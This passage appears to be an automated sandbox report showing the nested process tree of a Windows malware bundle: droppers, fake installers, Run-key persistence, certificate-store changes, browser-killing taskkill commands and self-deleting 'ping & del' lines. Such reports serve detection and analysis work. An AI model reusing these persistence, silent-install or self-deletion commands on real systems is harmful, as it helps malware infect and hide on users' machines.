                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-CSKTV.tmp\setups.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-CSKTV.tmp\setups.tmp" /SL5="$40470,726852,244736,C:\Users\Admin\AppData\Local\Temp\GBBT1UZH4R\setups.exe" ll
                                                                                                              13⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:6956
                                                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                          11⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          PID:2444
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PPGFT.tmp\LabPicV3.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PPGFT.tmp\LabPicV3.tmp" /SL5="$10606,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                            12⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:2576
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-QJPGF.tmp\alpATCHInO.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-QJPGF.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                                              13⤵
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:6764
                                                                                                              • C:\Program Files\Java\LWEHLPVQGW\prolab.exe
                                                                                                                "C:\Program Files\Java\LWEHLPVQGW\prolab.exe" /VERYSILENT
                                                                                                                14⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5344
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-5VPDM.tmp\prolab.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-5VPDM.tmp\prolab.tmp" /SL5="$106C8,575243,216576,C:\Program Files\Java\LWEHLPVQGW\prolab.exe" /VERYSILENT
                                                                                                                  15⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:6032
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5d-c912b-3da-1fd9c-0515133a7428c\Qytijedosi.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5d-c912b-3da-1fd9c-0515133a7428c\Qytijedosi.exe"
                                                                                                                14⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4448
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\36-b7ec3-acf-4a2b8-ba3f4de09aa37\Qupidomeri.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\36-b7ec3-acf-4a2b8-ba3f4de09aa37\Qupidomeri.exe"
                                                                                                                14⤵
                                                                                                                  PID:5988
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zdkz200h.3do\gaooo.exe & exit
                                                                                                                    15⤵
                                                                                                                      PID:7396
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jm125u1g.nmk\jgjg_note8876.exe & exit
                                                                                                                      15⤵
                                                                                                                        PID:7076
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          16⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:7004
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jm125u1g.nmk\jgjg_note8876.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jm125u1g.nmk\jgjg_note8876.exe
                                                                                                                          16⤵
                                                                                                                            PID:8328
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbcjnzbd.h1f\google-game.exe & exit
                                                                                                                          15⤵
                                                                                                                            PID:8768
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\qbcjnzbd.h1f\google-game.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\qbcjnzbd.h1f\google-game.exe
                                                                                                                              16⤵
                                                                                                                                PID:9160
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                                                  17⤵
                                                                                                                                    PID:8808
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybkbdjro.2rq\askinstall31.exe & exit
                                                                                                                                15⤵
                                                                                                                                  PID:9184
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ybkbdjro.2rq\askinstall31.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ybkbdjro.2rq\askinstall31.exe
                                                                                                                                    16⤵
                                                                                                                                      PID:6540
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                        17⤵
                                                                                                                                          PID:3024
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                            18⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:4040
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\by3hmtbk.f03\toolspab1.exe & exit
                                                                                                                                      15⤵
                                                                                                                                        PID:5224
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\by3hmtbk.f03\toolspab1.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\by3hmtbk.f03\toolspab1.exe
                                                                                                                                          16⤵
                                                                                                                                            PID:7048
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\by3hmtbk.f03\toolspab1.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\by3hmtbk.f03\toolspab1.exe
                                                                                                                                              17⤵
                                                                                                                                                PID:8612
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zuniqhy.5ez\setup_10.2_mix.exe & exit
                                                                                                                                            15⤵
                                                                                                                                              PID:6216
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1zuniqhy.5ez\setup_10.2_mix.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1zuniqhy.5ez\setup_10.2_mix.exe
                                                                                                                                                16⤵
                                                                                                                                                  PID:8292
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pawppgdu.4md\a1207b55.exe & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:5072
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pawppgdu.4md\a1207b55.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\pawppgdu.4md\a1207b55.exe
                                                                                                                                                    16⤵
                                                                                                                                                      PID:5780
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmfu21cc.zdm\app.exe /8-2222 & exit
                                                                                                                                                    15⤵
                                                                                                                                                      PID:3548
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmfu21cc.zdm\app.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\tmfu21cc.zdm\app.exe /8-2222
                                                                                                                                                        16⤵
                                                                                                                                                          PID:4608
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmfu21cc.zdm\app.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmfu21cc.zdm\app.exe" /8-2222
                                                                                                                                                            17⤵
                                                                                                                                                              PID:6160
                                                                                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                  11⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5960
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-SNIOM.tmp\lylal220.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-SNIOM.tmp\lylal220.tmp" /SL5="$1060A,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:4396
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LL1V9.tmp\ysAGEL.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LL1V9.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                                                                      13⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      PID:6804
                                                                                                                                                      • C:\Program Files\VideoLAN\DSBNWNDROD\irecord.exe
                                                                                                                                                        "C:\Program Files\VideoLAN\DSBNWNDROD\irecord.exe" /VERYSILENT
                                                                                                                                                        14⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6696
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-AISF0.tmp\irecord.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-AISF0.tmp\irecord.tmp" /SL5="$206E0,5922518,66560,C:\Program Files\VideoLAN\DSBNWNDROD\irecord.exe" /VERYSILENT
                                                                                                                                                          15⤵
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:7104
                                                                                                                                                          • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                                            "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                            16⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:7488
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\65-25fec-c4c-0c3a1-0f6e4a7668b96\Xaetigalaegi.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\65-25fec-c4c-0c3a1-0f6e4a7668b96\Xaetigalaegi.exe"
                                                                                                                                                        14⤵
                                                                                                                                                          PID:6288
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd-0c02f-67b-33fa7-cff687fbf4a46\Mucyvudaeba.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bd-0c02f-67b-33fa7-cff687fbf4a46\Mucyvudaeba.exe"
                                                                                                                                                          14⤵
                                                                                                                                                            PID:7184
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5qxdee3.dml\gaooo.exe & exit
                                                                                                                                                              15⤵
                                                                                                                                                                PID:5924
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iluo2wvf.jrd\jgjg_note8876.exe & exit
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:6916
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\iluo2wvf.jrd\jgjg_note8876.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\iluo2wvf.jrd\jgjg_note8876.exe
                                                                                                                                                                    16⤵
                                                                                                                                                                      PID:6192
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fl1lr4iw.igx\google-game.exe & exit
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:8564
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fl1lr4iw.igx\google-game.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fl1lr4iw.igx\google-game.exe
                                                                                                                                                                        16⤵
                                                                                                                                                                          PID:7132
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                                                                                            17⤵
                                                                                                                                                                              PID:4916
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vpgwmjh2.lmv\askinstall31.exe & exit
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:4988
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vpgwmjh2.lmv\askinstall31.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\vpgwmjh2.lmv\askinstall31.exe
                                                                                                                                                                              16⤵
                                                                                                                                                                                PID:5268
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jair4ml.lz0\toolspab1.exe & exit
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:8448
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0jair4ml.lz0\toolspab1.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\0jair4ml.lz0\toolspab1.exe
                                                                                                                                                                                  16⤵
                                                                                                                                                                                    PID:6304
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0jair4ml.lz0\toolspab1.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\0jair4ml.lz0\toolspab1.exe
                                                                                                                                                                                      17⤵
                                                                                                                                                                                        PID:8280
                                                                                                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5588
                                                                                                                                                                            • C:\ProgramData\41107.exe
                                                                                                                                                                              "C:\ProgramData\41107.exe"
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:7024
                                                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                13⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:6348
                                                                                                                                                                            • C:\ProgramData\4837380.exe
                                                                                                                                                                              "C:\ProgramData\4837380.exe"
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:7004
                                                                                                                                                                              • C:\ProgramData\4680920.exe
                                                                                                                                                                                "C:\ProgramData\4680920.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:7128
                                                                                                                                                                                • C:\ProgramData\4680920.exe
                                                                                                                                                                                  "{path}"
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:6212
                                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe
                                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:5416
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qipwd5efaah\xyhez3hz0fk.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\qipwd5efaah\xyhez3hz0fk.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5028
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qipwd5efaah\xyhez3hz0fk.exe"
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:5508
                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                10⤵
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:5924
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2b3i1wz3x1b\ebekznsi4ym.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2b3i1wz3x1b\ebekznsi4ym.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:5440
                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2b3i1wz3x1b\ebekznsi4ym.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2b3i1wz3x1b\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617976633 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:5808
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8KDZJBYS3I\setups.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\8KDZJBYS3I\setups.exe" ll
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:636
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-97OMP.tmp\setups.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-97OMP.tmp\setups.tmp" /SL5="$702F2,726852,244736,C:\Users\Admin\AppData\Local\Temp\8KDZJBYS3I\setups.exe" ll
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:3992
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:2828
                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:3676
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:2172
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:584
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4364
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:4720
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4392
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4820
                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:5008
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2444
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5752
                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5752 -s 1656
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:8336
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4660
                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      PID:4760
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4636
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4332
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:6064
                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:6092
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 563D9238B05B828D25AC8B92F3C48545 C
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:2560
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 09D25C8CA8540FE8CE6FC825A63DBE73
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:6960
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:9108
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:9200
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:7640
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ff972f29ec0,0x7ff972f29ed0,0x7ff972f29ee0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:2800
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:6408
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=1888 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6996
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
